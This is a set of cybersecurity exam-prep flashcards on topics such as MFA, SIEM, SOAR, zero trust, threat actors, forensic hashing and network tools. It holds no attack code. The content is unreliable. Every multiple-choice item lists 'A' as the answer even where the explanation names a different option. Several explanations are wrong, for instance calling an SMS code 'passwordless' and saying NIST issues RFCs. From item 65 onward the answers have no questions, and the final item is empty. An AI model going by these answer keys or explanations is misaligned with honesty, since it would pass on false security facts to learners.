1. Cyber Security Concepts Flashcards

Question 1

Q

A hacktivist group claims responsibility for infecting a manufacturer’s systems by planting an infected USB drive at the company’s office. The manufacturer’s distributor, several vendors, and hundreds of customers were all eventually infected with the malware that stole important credential information.

Which term describes this attack strategy?

A)Cloud-based
B)Direct access
C)Supply-chain
D)Social media

Answer

A

A supply-chain attack is not an attack on a target directly but on a more vulnerable company or resource within its supply chain that helps the organization conduct business or create a product. An increasing number of hacks are being carried out this way.

Direct access is the most straightforward type of attack and usually the most preventable. It is a physical or local attack, such as an attacker exploiting an unlocked workstation and using a boot disk to install malicious tools or simply stealing a device.

In a cloud-based attack, hackers may try and exploit vulnerabilities in cloud-based web service providers to gain access to a tenant organization’s data.

Social media attacks occur when malware is attached to social media posts or presented as downloads on social media sites. At their most dangerous, hackers can make it so a compromised site automatically infects a vulnerable computer.

Question 2

Q

In order to log onto a system, you must first complete a CAPTCHA, then enter a code that is sent to your cell phone via SMS. What is that code an example of?

A)Passwordless
B)Cloud access security broker
C)Multi-factor authentication
D)Single sign-on

Answer

A

Passwordless authentication provides alternative mechanisms to authenticate users, using items that do not have to be remembered by the user. Examples of passwordless authentication include hardware tokens, smart cards, biometrics, and one-time passcodes sent to a cell phone.

Question 3

Q

CASB

Answer

A

A cloud access security broker (CASB) is a checkpoint where security policies are enforced, located between an organization’s users and its cloud providers. A CASB can ensure cloud security by comparing users, applications, and devices against multiple security policies.

Question 4

Q

What Criteria does MFA involved in?

Answer

A

Multi-factor authentication (MFA) involves using two independent sets of information to authenticate a user. Common MFA methods are:

Something you know, such as a user name, password, or PIN.

Something you are, such as a biometric measurement, e.g. a fingerprint or facial recognition.

Something you have, such as a smart card or token.

Somewhere you are, often based on your GPS coordinates.

Question 5

Q

In security operations, which of the following would provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness?

A)Windows registry
B)Logging levels
C)System processes
D)System hardening

Answer

A

System processes provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness, to name a few. A Security Operations Center (SOC) operates 24x7 maintain the organization’s security posture. The abovementioned system processes provide the guidelines that the SOC uses for its operations.

Question 6

Q

Windows Registry?

Answer

A

The Windows registry is a database that contains all the application settings and current configuration parameters for the hardware and software on a Windows system. Each machine running a Windows OS has a registry that contains keys (which identify applications, processes, hardware) and values (specific configuration data related to the key). For example, if a key was related to a printer, values associated with the key could include printing orientation, print history, default paper tray, and default paper size.

The Windows OS uses the registry database for storing all configuration settings. In Linux, each application and process has its own configuration file. The Linux file structure uses the /etc/ directory for configuration file locations.

Hardware architecture is also an important concept. If the hardware is not secure, it would be very difficult to build secure applications and databases and to have high availability. Physical access to critical hardware, such as servers, routers, wireless access points, and network switches, is often overlooked. It is not uncommon that administrative passwords are set to the default, firmware does not get updated, and encryption is not adequate for the device.

Question 7

Q

What are the logging levels classification?

Answer

A

Logging levels are classifications that indicate the severity or urgency of the logged event. Common logging levels include Emergency, Alert, Critical, Error, Warning, Notice, and Debug.

Question 8

Q

System Hardening

Answer

A

System hardening increases the security of a server or a computer system by reducing vulnerabilities and the attack surface. Examples of system hardening activities include removing unnecessary applications, closing down ports, and adjusting permissions.

Question 9

Q

Which of the following has a Policy Engine, a Policy Administrator, and a Policy Enforcement Point?

A)Personally identifiable information (PII)
B)Cardholder data
C)Data loss prevention
D)Zero trust

Answer

A

Zero-trust architecture consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement Point. The goal of zero trust is to continuously monitor the authentication and authorization of devices, users, and processes. The Policy Engine is responsible for granting or denying access based primarily on policy, but other factors can be taken into consideration. The Policy Administrator decides to open or close the communication path from the requestor to the resource, based on the decision of the Policy Engine. The Policy Enforcement Point establishes and terminates the connections.

Question 10

Q

What does DLP prevent when it comes to PII and CHD?

Answer

A

Data loss prevention (DLP), personally identifiable information (PII), and cardholder data (CHD) are all related to sensitive data protection.

Data loss prevention is designed to detect and stop data exfiltration behavior by users. If DLP software is not present, data exfiltration might only be discovered after the event.

Personally identifiable information (PII) is data that can be used to identify a single individual.

Cardholder data is very sensitive data in e-commerce transactions. The manner in which a website uses CHD is regulated by the Payment Card Industry Data Security Standard (PCI DSS). The most recent version of PCI DSS is 4.0.

Question 11

Q

Your company is governed by several regulations that state that you must use automated systems that provide CCE and CVE identifiers for vulnerability scans. Which of the following should you implement?

A)SCAP
B)SIEM
C)NAC
D)SNMP

Answer

A

You should implement Security Content Automation Protocol (SCAP), which provides Common Configuration Enumeration (CCE) and Common Vulnerabilities and Exposures (CVE) identifiers.

Question 12

Q

SIEM

Answer

A

Security information and event management (SIEM) provides centralized security event management. When SIEM is implemented, security analysts can produce reports on all ingested data.

Question 13

Q

SNMP

Answer

A

Simple Network Management Protocol (SNMP) collects management information from devices. It is used to communicate with network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network.

Question 14

Q

The team is analyzing a shell script that was run on a server. How can they recognize comments in the script?

A)line starts with a #
B)line starts with $
C)line start with a !
D)line starts with a @

Answer

A

Comments are ignored by the shell. They typically begin with the hash symbol (#) and continue until the end of the line.

The exclamation mark (!) is used with the Equal relational operator. != means Not Equal and returns true if the two operands are not equal. Otherwise, it returns false.

The dollar sign ($) is used to return the value of the last executed command.

The at symbol (@) can be used with the $ symbol to pass all of the parameters to the script.

Question 15

Q

Obtaining which of the following can reduce the likelihood of purchasing counterfeit equipment?

A)Fingerprint
B)OEM documentation
C)SLA
D)Hash value

Answer

A

One of the ways you can reduce the likelihood of purchasing counterfeit equipment is to insist on the inclusion of verifiable original equipment manufacturer (OEM) documentation. In many cases, this paperwork includes anti-counterfeiting features. Make sure you use the vendor website to verify all of the various identifying numbers in the documentation.

Question 16

Q

You have quarantined an instance of malware and would like to execute the payload to see what it does without spreading it through the network. What tool or process could be used to do this safely?

A)Cuckoo Sandbox
B)email header analysis
C)DKIM
D)pattern recognition

Answer

A

Cuckoo Sandbox is used to investigate suspicious files or websites. It not only analyzes files and websites but also traces API calls, dumps any related network traffic, and analyzes the processes running in memory. When you execute a malicious payload in a sandbox, the sandbox allows it to run while preventing the spread of any activity generated by the malicious payload.

Question 17

Q

You are a cyber security analyst. Your organization has several products and services implemented within their IT environment. Management finds it difficult to view security and operational metrics for all the products. You recommend that management approve implementing single pane of glass solution to resolve the visibility issue.

Which of the following statements is NOT true of implementing a single pane of glass solution?

A)It increases efficiency by eliminating the need to switch back and forth between separate IT operations management solutions.
B)It provides an easy-to-navigate GUI.

C)It provides a centralized display of security and operational metrics that is readily available to management.

D)It displays and sends data in real time from the centralized application whenever relevant events occur in the environment.

Answer

A

A single pane of glass solution does not display and send data in real time when relevant events occur in the environment. You would implement webhooks in an application to display and send data in real time when a relevant event occurs in the environment. Webhooks can be leveraged to automate certain workflows.

A single pane of glass solution provides a single management console that displays data from multiple sources. The glass in the term “single pane of glass” refers to a computer monitor or mobile screen where users can view meaningful data from multiple sources.

Question 18

Q

What can a single pane of glass solution providers include in their features? What are the benefits?

Answer

A

A single pane of glass solution provides many features and benefits, such as:

A centralized display of security and operational metrics that is easy to read and understand by management.

An efficient solution that
eliminates the need to switch back and forth between IT operations management solutions.

An easy-to-navigate graphical user interface (GUI).

Typically, single pane of glass solutions also provides event alerts and notifications, root cause analysis, remote debugging capabilities, reporting, and the ability to integrate data from multiple technologies and vendors.

Question 19

Q

You are assisting a senior forensics investigator with a crime scene. While you are watching, he runs the following command:

user@kaplan:~# md5sum /dev/pw3

He receives the following output:

9b98b637a132974e41e3c6ae1fc9fc96 /dev/pw3

What is the long string of values in the output called?

A)Initialization vector
B)Hash value
C)Salt value
D)Encryption key

Answer

A

That value is the hash value, and it was derived by running the file against the now-deprecated MD5 hashing algorithm. This algorithm generates this value based on the contents of the file or volume against which it was run. Its value is in providing a way to determine, at a later time, if the file or volume has changed. To validate an image, a hash is generated for both the original and the copy. If the hashes match, then the images are identical. Both hashes should be recorded as part of the forensic log for the investigation.

It is not an encryption key. Encryption keys are used to encipher a message. MD5 does not perform encryption. It generates a value that can be used to determine the integrity of the file or volume.

It is not an initialization vector (IV). These are values used within certain encryption algorithms to add randomness to the calculations to prevent patterns in the output that can be used to reverse-engineer the encryption key.

A salt value is random data that is used as an additional input to a one-way function that “hashes” a password or passphrase. It is used to make cracking the hash more difficult.

Question 20

Q

Which network architecture concept allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents?

A)Secure Access Service Edge
B)Hybrid
C)Software-defined networking
D)On-premises

Answer

A

Software-defined networking (SDN) allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents.

On-premises network architecture allows an organization to maintain control of its architecture and resources by hosting it on-site. With on-premises, the organization can also host a private cloud on its hardware.

Hybrid cloud architecture is an environment where some items are stored in a public cloud and some items are stored in a private cloud. In short, a public cloud allows an organization to “rent space” (much like a tenant in an office building) from another organization in an Internet-accessible datacenter, place sharable resources in that space, and configure access to those resources. A private cloud is an Internet-accessible datacenter that serves only one tenant.

Secure Access Service Edge (SASE) is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

Question 21

Q

Which threat actor type can be characterized by having an unsophisticated skill level, uses widely available tools, and is frequently motivated by the need to prove that they can do it?

A)Nation-state
B)Script kiddie
C)Hacktivist
D)Organized crime

Answer

A

Script kiddies typically have an unsophisticated skill level and rely on tools that are widely available on the Internet. They are often motivated by the thrill of the chase and by the need to prove that they can do it. For the most part, script kiddies have limited time and financial resources.

Question 22

Q

Hactivists

Answer

A

Hacktivists are activists who use hacking techniques to promote their own political or social agenda. Their activities can cause DoS and DDoS attacks or they place embarrassing posts on websites or social media sites of an organization with opposing views. They often believe they are engaging in a righteous and morally correct cause, even if their activities are illegal. As with script kiddies, hacktivists often have limited time and financial resources. However, a hacktivist within a sophisticated or large organization may have access to significant resources.

Question 23

Q

Organized Crime

Answer

A

Organized crime attacks are carried out by criminal groups for the sole purpose of monetary gain. Organizations such as the Mafia, Russian organized crime, the Japanese Yakuza, and drug cartels have significant resources in terms of time and money to recruit hackers to carry out their agenda.

Question 24

Q

Nation-state or APT

Answer

A

Nation-state or Advanced Persistent Threat (APT) attacks are conducted by one nation against another nation, or against a significant entity within the target country, and feature large coordinated attacks. APT attackers have significant time and financial resources. Motives could be financial, political, disruption of the economy, or theft of intellectual property such as military secrets.

Question 25

Q

Your organization’s reputation is staked on a book it publishes yearly. When you perform data classification, how should you classify this book and its contents?

A)intellectual property
B)corporate confidential data
C)PHI
D)personally identifiable information

Answer

A

~]Intellectual property is a tangible or intangible asset to which the owner has exclusive rights. Intellectual property law is a group of laws that recognizes exclusive rights for creations of the mind. This includes books and music.

Question 26

Q

PII

Answer

A

Personally identifiable information (PII) is any piece of data that can be used alone or with other information to identify a single person.

Question 27

Q

PHI

Answer

A

Personal health information (PHI) is the medical records of individuals and must be protected in specific ways as prescribed by the regulations contained in the Health Insurance Portability and Accountability Act (HIPAA) of 1996.

Question 28

Q

Corporate confidential data

Answer

A

Corporate confidential data includes trade secrets, intellectual data, application programming code, and other data that could seriously affect the organization if unauthorized disclosure occurred. The book contains corporate data, but it cannot be considered confidential if it is released into the public space every year.

Question 29

Q

During a data classification meeting, someone mentions a type of data covered by PCI DSS. What type of data is this?

A)Corporate confidential data
B)PHI
C)Intellectual property
D)Credit card data

Answer

A

The Payment Card Industry Data Security Standard (PCI DSS) affects any organizations that handle cardholder data (CHD) for the major credit card companies. The latest version of the standard is 4.0. To prove compliance with the standard, an organization must be reviewed annually.

Question 30

Q

You need a tool that can aggregate logs from multiple firewalls, send alerts when certain behaviors are detected in the network, provide trend analysis, and analyze user behavior. What should you choose?

A)WHOIS
B)SOAR
C)SIEM
D)EDR

Answer

A

A Security Information and Event Management (SIEM) system collects data from the different security devices in the system, such as firewalls and IPSes, and then aggregates the log files for analysis. It provides predictive trend analysis, behavior analytics, alerts, and even helps you comply with regulations like SOX and HIPAA. Automated alerting and triggers are SIEM features that allow the system to react based on predetermined criteria.

Question 31

Q

SOAR

Answer

A

A Security Orchestration, Automation, and Response (SOAR) playbook is a checklist of incident response steps to be performed when an incident occurs. In Microsoft Azure, the Azure Sentinel service has playbooks that automate and orchestrate responses to threats. You can configure a playbook to run manually or automatically in response to specific alerts or incidents that are triggered by an automation rule.

Question 32

Q

EDR

Answer

A

Endpoint Detection Response (EDR) is designed to supplement existing systems. It focuses on a proactive versus reactive approach for the detection and prevention of threats before they can attack the organization.

Question 33

Q

WHOIS

Answer

A

WHOIS is a service that can be used to identify details on the owner of a website.

Question 34

Q

You have discovered that several workstation computers on your company’s network have been infected with a Trojan that is used to target a single server. Which vulnerability has infected the workstation computers?

A)APT
B)Ransomware
C)Spyware
D)DDoS

Answer

A

A Distributed Denial of Service (DDoS) is the vulnerability that has infected the workstation computers. The workstations will now act as zombies to carry out the attack on a single server.

Spyware enables an attacker to obtain information about another’s computer activities by transmitting data covertly from their hard drive.

Ransomware is malicious software that blocks access to a computer system until a sum of money is paid.

An advanced persistent threat (APT) is an attack in which an unauthorized user accesses a network and stays there undetected for a long period of time with the intention of stealing data.

Question 35

Q

You are a security analyst working with a forensic investigator. The investigator has found data on a very old Windows computer. You decide to run OpenVAS. Which function is provided by this tool?

A)Vulnerability scan
B)Fuzzer
C)Packet capture
D)Interception proxy

Answer

A

OpenVAS is a vulnerability scan tool. Other vulnerability scanning tools include Qualys, Nessus, OpenVAS, Nexpose, and Nikto.

Question 36

Q

Fuzzer

Answer

A

Fuzzers include Untidy, Peach Fuzzer, and Microsoft SDL File/Regex Fuzzer

With fuzzing, random data is run against your test in an attempt to find vulnerabilities or crash-causing inputs. Some examples of vulnerabilities that can be found by fuzzing are SQL injection, buffer overflow, denial of service and cross-site scripting attacks.

Question 37

Q

Interception Proxies

Answer

A

Interception proxies include Burp Suite, ZAP, and Vega

Question 38

Q

Packet Capture Tools

Answer

A

Packet capture tools include Wireshark, tcpdump, Network General, and Aircrack-ng.

Question 39

Q

Which of the following is a process similar to building a system image but for applications?

A)Serverless
B)Containerization
C)Federation
D)Virtualization

Answer

A

Containerization is similar to building a system image, but for applications. It is an application development model that stores everything needed to run that application in an executable image. All of the libraries, binaries, configuration info, etc., are stored in the container.

Question 40

Q

Severless

Answer

A

Serverless is an application development model that provides developers the opportunity to build and run applications in the cloud, without the added responsibility of having to maintain servers.

Question 41

Q

Federation

Answer

A

Federation allows customers of different cell phone services to communicate with each other. While each network has its own infrastructure, devices such as routers and gateways as well as network services are uniformly configured to a common standard. In general, federation allows members of disparate networks to communicate with each other.

Question 42

Q

You have just been hired as a junior cybersecurity analyst. The orientation process involves shadowing a senior analyst. To gauge your current knowledge level, the senior analyst is testing your ability to recognize various tools of the trade. He gives you a quick look at a tool’s GUI.

Answer

A

The tool shown is Wireshark, which is a packet analyzer. Packet analyzers are also called sniffers or protocol analyzers. This type of tool captures traffic on the network.

Question 43

Q

Which of the infrastructure concepts below provides developers with the opportunity to build and run applications in the cloud, without the extra responsibility of having to maintain servers?

A)Serverless
B)Secure Access Service Edge
C)Containerization
D)Virtualization

Answer

A

Serverless is an application development model that provides developers the opportunity to build and run applications in the cloud, without the extra responsibility of having to maintain servers on premises.

Question 44

Q

SASE

Answer

A

Secure Access Service Edge (SASE) is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

Question 45

Q

Recently, there was an attack on the network, but the team was unable to gather enough information to identify the attacker. If the attack happens again, then you want to have more time to gather information while it is still occurring. What should you implement?

A)Subnets
B)VLAN
C)Honeypot
D)Jump box

Answer

A

You should implement a honeypot. Honeypots are systems that are configured to be attractive to hackers and lure them into spending time attacking them while information is gathered about the attack.

Question 46

Q

Which of the following network architecture concepts consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement point?

A)Hybrid
B)Zero-trust
C)Cloud
D)Secure Access Service Edge

Answer

A

Zero-trust architecture consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement Point. The goal of zero trust is to continuously monitor the authentication and authorization of devices, users, and processes. The Policy Engine is responsible for granting or denying access based primarily on policy, but other factors can be taken into consideration. The Policy Administrator decides to open or close the communication path from the requestor to the resource, based on the decision of the Policy Engine. The Policy Enforcement Point establishes and terminates the connections.

Question 47

Q

Your team has recently become concerned with activity on unexpected ports. You need to display the current protocol statistics and port connections for Windows and UNIX/Linux computers. Which command should you use?

A)netstat
B)tracert
C)ping
D)nbtstat

Answer

A

Netstat (network statistics) is a TCP/IP utility that you can use to determine the computer’s inbound and outbound TCP/IP connections. Used without parameters, it displays a list of the current connections and their listening ports, including the protocol (TCP or UDP), local IP address and port, foreign IP address and port, and connection state.

When connections to unexpected ports are suspected, netstat can be used to identify the origin of any connections to the ports in question.

Newer versions of LINUX do not support netstat. In those versions, use the ss (socket statistics) command. To see all current TCP connections and their listening ports, you would run the ss – lt command, as shown below:

mcmillan@server69:~$ ss -lt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :7080 :
LISTEN 0 128 :6032 *:
LISTEN 0 128 :http *:
LISTEN 0 128 :6033 *:
LISTEN 0 128 :6033 *:
LISTEN 0 128 :6033 *:
LISTEN 0 128 :6033 *:
LISTEN 0 128 :ssh *:
LISTEN 0 128 :https *:
LISTEN 0 128 :::ssh
:::

Question 48

Q

What is the syntax for NetBios Information?

Answer

A

Issuing nbtstat at a Windows command prompt will show NetBIOS information.

Question 49

Q

Tracert vs Traceroute

Answer

A

Issuing tracert at a Windows command prompt will trace the route a packet takes from the source computer to the destination host. Traceroute is the Linux equivalent of the tracert command.

Question 50

Q

Which of the following is NOT an open-source method of collecting threat intelligence?

A)social media
B)blogs/forums
C)paid feeds
D)government bulletins

Answer

A

While paid security feeds are valuable, they are not considered open source, rather they are considered closed source because they are not available to everyone at no cost. They are proprietary and paid, and therefore considered closed-source intelligence.

Social media sites, blogs, and forums can be used to gather threat intelligence, especially when steps have not been taken to keep the organization’s sensitive data off the social media site. Since these public sites are available to all, any information useful to an attacker that is gathered from these sources is open-source intelligence.

Blogs and forums can also be sources of threat intelligence when bloggers and forum writers reveal more than they should about an organization’s information. Since these sites are available to all, this is open-source intelligence.

Government bulletins are a good source of the details of the latest known attacks and attack approaches. Since these bulletins are available to all, this is open-source intelligence.

Question 51

Q

You are a cyber security consultant for your company. Developers are creating an e-commerce application with a trial version and a paid version. You must recommend a solution that will automatically update the user’s trial subscription to the paid version once the user makes the purchase and the payment is processed.

Which solution should you recommend?

A)Integrate webhooks that will update the user’s trial version to the premium version.

B)Integrate plugins that will update the user’s trial version to the premium version.

C)Integrate an API that will update the user’s trial version to the premium version.

D)Integrate applets that will update the user’s trial version to the premium version.

Answer

A

You should recommend integrating webhooks into the application that will automatically update the trial version to the paid version when the payment is successfully processed. The webhook will be triggered when the payment processor notifies the application that the payment is complete, and not in scenarios where the payment fails to process or the payment session times out.

Question 52

Q

API

Answer

A

An application programming interface (API) is a web service that enables your application to interact with a database, other applications, and other platforms. Your application can be your SaaS product or an e-commerce website. While an API can be used for functions such as displaying dynamic data in your application (in which the API is called to fetch the information from the database and display it) it cannot be used to upgrade pr update an application version.

Question 53

Q

PlugIns

Answer

A

Plugins are small reusable components or programs that can be added to your web applications for additional functionality. For example, when you add WordPress plugins to your WordPress website it enhances the web application’s functionality. In this scenario, plugins cannot be used to automate the subscription upgrade upon payment.

Question 54

Q

Applets

Answer

A

An applet is a small program that is coded to perform specific function in an application. Applets are mostly associated with Java programming language. Applets provides limited functionality and cannot be used to automate the subscription upgrade upon payment.

Question 55

Q

You have observed that your network has fended off breach attempts from the same IP address several times recently. Which of the following could you use to address the issue?

A)Strings
B)AbuseIPDB
C)VirusTotal
D)Joe Sandbox

Answer

A

AbuseIPDB is a project dedicated to helping combat the spread of hackers, spammers, and abusive activity on the Internet by providing a central blacklist for webmasters, system administrators, and other interested parties to report and find IP addresses that have been associated with malicious activity online. Like the WHOIS database, which can be searched for DNS domains with a bad reputation for sending malicious traffic, AbusePBD reports on IP addresses and ranges of addresses with a bad reputation for engaging in hacking attempts or other malicious behavior.

Question 56

Q

Strings

Answer

A

Strings is a utility that searches an executable for ASCII and Unicode strings. It ignores context and formatting, so it can analyze any file type and detect strings across an entire file (although this also means that it may identify bytes of characters as strings when they are not).

Question 57

Q

Virus Total

Answer

A

VirusTotal checks the hash values of a suspect file against those in online and offline malware databases. Further examination is made easier as a result of this procedure, which reveals more about the code’s functioning and other important data.

Question 58

Q

Joes Sandbox

Answer

A

Joe Sandbox detects and analyzes potential malicious files and URLs on Windows, Android, macOS, Linux, and iOS for suspicious activities. It performs deep malware analysis and generates comprehensive and detailed analysis reports.

Question 59

Q

Which of the following is NOT a consideration when establishing the confidence level in the findings of a vulnerability scan?

A)accuracy of scan results
B)relevance of scan results
C)cost of scan results
D)timeliness of scan results

Answer

A

While it is true that security initiatives, such as a vulnerability scan, must create value that exceeds the cost, the cost of obtaining the scan results is not a consideration when establishing the confidence level in the findings.

The accuracy of the results is perhaps the most important consideration when establishing the confidence level. Inaccurate results can lead to wasted effort on noncritical issues, while more critical issues are left unaddressed.

The relevance of the results is also consideration when establishing the confidence level because in some cases results may indicate an issue that, while present, is irrelevant. For example, a missing patch for SQL Server is irrelevant when the organization uses Oracle.

Finally, the timeliness of the results is a consideration. Older data may be less valuable than more recent data because there is more time to react to a new issue, while it may be that nothing can be done about an older issue.

Question 60

Q

A recent attack was allowed to continue longer than it should have because the cybersecurity team was slowed by the need to locate and read the security logs on the infrastructure devices through which the attack flowed.

During the lessons learned meeting, mitigations for this problem were discussed. Which of the following would allow you to not only centralize the logs but also centralize their analysis for security issues?

A)SCADA
B)SIEM
C)Syslog
D)NetFlow

Answer

A

Security information and event management (SIEM) software can collect logs from specified devices, combine the logs, and analyze the combined logs for security issues. By doing so, they can identify attacks that would be more difficult to identify otherwise.

Question 61

Q

Which of the following is a system that has been isolated from the other systems and is used for analyzing suspicious files and messages for malware?

A)Honeypot
B)Sheep dip computer
C)Sandbox
D)Virtual machine

Answer

A

One option for studying malware is to set up a sheep dip computer. This is a system that has been isolated from the other systems and is used for analyzing suspicious files and messages for malware.

Question 62

Q

You are a cybersecurity analyst for your organization. You are in the process of implementing Security Orchestration Automation and Response (SOAR) tools that will collect data about security threats from various sources and respond to security incidents in an automated manner.

Which of the following statements is NOT true of a SOAR solution?

A)It creates a knowledge base and help organizations to avoid and deal with security threats.

B)It analyzes collected data, identifies patterns, and automatically assesses and triggers alerts for appropriate action and response.

C)It receives alerts about security incidents and responds to each incident.

D)It provides a fully automated workflow from alert validation through playbook activation.

Answer

A

A SOAR solution does not analyze collected data to identify patterns, then automatically assess and trigger alerts for action and response. These functions are performed by a Security Incident and Event Management (SIEM) solution. SIEM technology collects event log data from a range of sources, identifies activity that deviates from the norm with real-time analysis, and takes appropriate action.

Question 63

Q

What are the three components of SOAR?

Answer

A

SOAR is a software technology platform that enables organizations to collect relevant data about security threats and respond to security events with minimal human intervention. SOAR platforms combine three components:

Security orchestration
Security automation
Security response

Question 64

Q

What are the three capabilities of SOAR?

Answer

A

A SOAR solution has the following capabilities:

Provides a fully automated workflow from alert validation through playbook activation.
Creates a knowledge base and helps the organization avoid and manage security threats.
Receives alerts about security incidents and responds automatically to the incident.

Answer 65

A

SOAR provides advanced threat protection and acts as a vital component of security operations across various divisions of the organization. Organizations use SOAR to monitor threat investigations and responses, for security intelligence management, and for security operations center (SOC) optimization. SOAR helps organizations improve the efficiency and effectiveness of their security operations by:

Improving response time to security incidents

Facilitating the investigation process

Integrating disparate threat protection technologies into a unified dashboard

Minimizing the impact caused by attacks

Managing and reporting security threats

Visualizing meaningful information through dashboards

Reducing operating costs

Answer 66

A

SOAR is designed to automate and orchestrate incident response processes, streamlining workflows and enabling faster responses to security incidents. Conversely, SIEM primarily focuses on collecting, analyzing, and correlating security event data to provide insights and detect threats in real-time.

Answer 67

A

The attack described has all the elements of an advanced persistent threat (APT). An APT is a hacking process that targets a specific entity and is carried out over a long period of time. In most cases, the victim of an APT is a large corporation or government entity. The attacker is usually a group of organized individuals or a hostile government.

In an APT, the attackers have a pre-defined objective, such as a specific asset belonging to your organization (including smartcard credentials, control of social media logins, a database of PII, and so on). Once the objective is met, the attacks stop. APTs can often be detected by monitoring logs and network performance metrics.

Answer 68

A

A passive attack is one in which the attacker only captures information but does not take any actions or send any data on the network. APT attacks are active attacks in which actions are taken by the attacker. However, APTs typically begin with passive reconnaissance.

Answer 69

A

A Completely Automated Public Turing Test to Tell Computers and Humans Apart (CAPTCHA) system uses a graphic, which is difficult for a bot to read but not a human, to ensure that bots (automated process used by hackers to create accounts) are not allowed to create accounts.

Answer 70

A

A Request for Comments (RFC) is often issued when a new technology or practice is suggested within the industry. It represents a call for peer review on the subject. RFCs are administered and issued by various bodies, among them the Internet Engineering Task Force (IETF) and the National Institutes of Standards and Technology (NIST).

Answer 71

A

TTP stands for tactics, techniques, and procedures and is a concept that is used to identify patterns of behavior that can be employed to defend against certain strategies and threat vectors utilized by malicious actors.

Answer 72

A

Structured Threat Information eXpression (STIX) defines a common language for discussion threat intelligence and serializes it into a coherent format. It is a tool for spreading information about vulnerabilities, and not a research source.

Answer 73

A

TAXII stands for Trusted Automated eXchange of Indicator Information. It was designed to specifically support STIX by defining how cyber-threat information can be shared via services and message exchanges. STIX and TAXII are both tools for sharing research, not research sources.

Answer 74

A

Steganography is the process of removing some bits of information about a graphic and inserting data that you want to hide in place of the missing graphic information. This swapping does not typically have a noticeable effect on the graphic, but it allows the sender to hide data that can be extracted later via the same application used to insert it into the graphic. The best defense against steganography is to periodically scan PCs for questionable software. The presence of steganography software on any system should be prohibited unless it is specifically required for business purposes.

Answer 75

A

This is not double tagging. Double tagging is an attack that allows a malicious individual to access a VLAN for which they are not a member. Double-tagging attacks can be prevented by keeping the native VLAN of the trunk ports different from the user VLANs.

Answer 76

A

This is not masquerading. Masquerading is when a single public IP address is used by all interior devices when accessing the Internet. This is done by deploying Network Address Translation (NAT). It is called NAT because none of the devices will reveal their private IP address to the outside world.

Answer 77

A

Changes to the registry or anomalies in the registry settings is a host-related issue, as these settings affect the entire system.

Answer 78

A

Anomalous activity, such as an application shutting down unexpectedly, is an application-related issue.

When new accounts for an application appear, it is an application-related issue. It is also an indication of a serious security issue, as adding accounts probably requires administrator rights.

When a program begins to display unexpected output, such as a strange new dialog box, it is an indication of an application-related security issue. In many cases this is an indication that a malware infection has occurred.

Answer 79

A

You are implementing endpoint security. Endpoint security involves protecting the endpoints (workstations, printers, and so on) in the network, including protecting them from other endpoints that spend at least some of the time outside the LAN. This is done by verifying patches and updates before the device is allowed access to the network. Endpoint security also includes the process of hardening endpoints.

Answer 80

A

You are not implementing a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

Answer 81

A

A SYN flood is a denial-of-service (DoS) attack that originates from outside the network. It has nothing to do with social engineering.

Answer 82

A

While all of these issues should be a concern, when heavy bandwidth consumption is detected in the network the most likely cause is a denial-of-service (DoS) attack. High bandwidth usage is the key symptom of a DoS attack. The best course of action is to identify the source of the traffic and block it at the firewall. Going forward, you should prevent all traffic from outside the network that uses a source address that is a private address, keep all anti-malware up to date, and ensure that users are trained in safe practices.

Answer 83

A

A buffer overflow would not typically cause a surge in bandwidth usage. When these attacks occur, the device usually crashes. A symptom of buffer overflow is a device suddenly becoming unavailable. If this occurs, then all web applications in the device should be checked for proper input validation.

A buffer overflow attack typically involves violating programming languages and overwriting the bounds of the buffers they exist on. Most buffer overflows are caused by the combination of manipulating memory and mistaken assumptions around the composition or size of data.

Answer 84

A

Infrastructure as code (IaC) is the process of using definition and configuration files to provision and manage data centers. Automating this process through scripts can ensure that there is more control and less opportunity for error when deploying servers, as compared with manual configuration. IaC is the foundation for Secure DevOps. Secure Development Operations (Secure DevOps) means that security is built into all your development operations.

Answer 85

A

Waterfall is a development framework that uses tightly defined processes that are executed in a linear sequence.

Answer 86

A

Agile is a cyclical methodology where development phases are iterative, and each cycle moves the project a little closer to the final product.

Answer 87

A

Immutable systems are those where the configuration is static and may not be changed.

Answer 88

A

Single sign-on (SSO) is not associated with PKI. It is a process that allows users to log on once to the network and thereafter not be required to issue another password to access resources.

Certificate authority (CA) is an element of PKI. The CA validates the entities identified in the certificate.

The registration authority (RA) authorizes certificates. The RA validates the user request for a certificate and directs the CA to issue the certificate.

The certificate store is used by applications running on a system to retrieve stored certificates, certificate trust lists, and certificate revocation lists.

Another element of PKI is the certificate database. This database stores information about the certificate, as well as the validity status and the validity period.

Answer 89

A

Part of risk management is identifying mitigations, called controls, to address issues. Examples of the types of controls are:

Preventative controls: controls that stop something from occurring, such as locks.

Managerial controls: controls that specify acceptable practices within an organization, such as acceptable use policies.

Corrective controls: controls put in place to reduce the effect of an attack or other undesirable event, such as backups.

Answer 90

A

If a user modifies a browser’s security settings to make it more convenient to visit websites, such as turning off pop-up blockers and anti-phishing controls, this is an example of a weak configuration. Misconfiguration and weak configurations can have a severe impact on the entire organization. Misconfiguration, such as not changing the default administrative user name or password, can also have a significant impact.

Answer 91

A

Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application but rather generate an error message. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many small office/home office (SOHO) users are thrilled that they got their new wireless network to finally communicate “out of the box.” As a result, they do not change the default administrator information, leaving their network wide open for attack.

Answer 92

A

Privileged access management (PAM) is a process that provides extra protection for roles above the level of regular users, such as an administrator or a service account. If an account that is assigned special access is compromised, that breach can have a more significant impact than a breach of a regular user’s account.

Answer 93

A

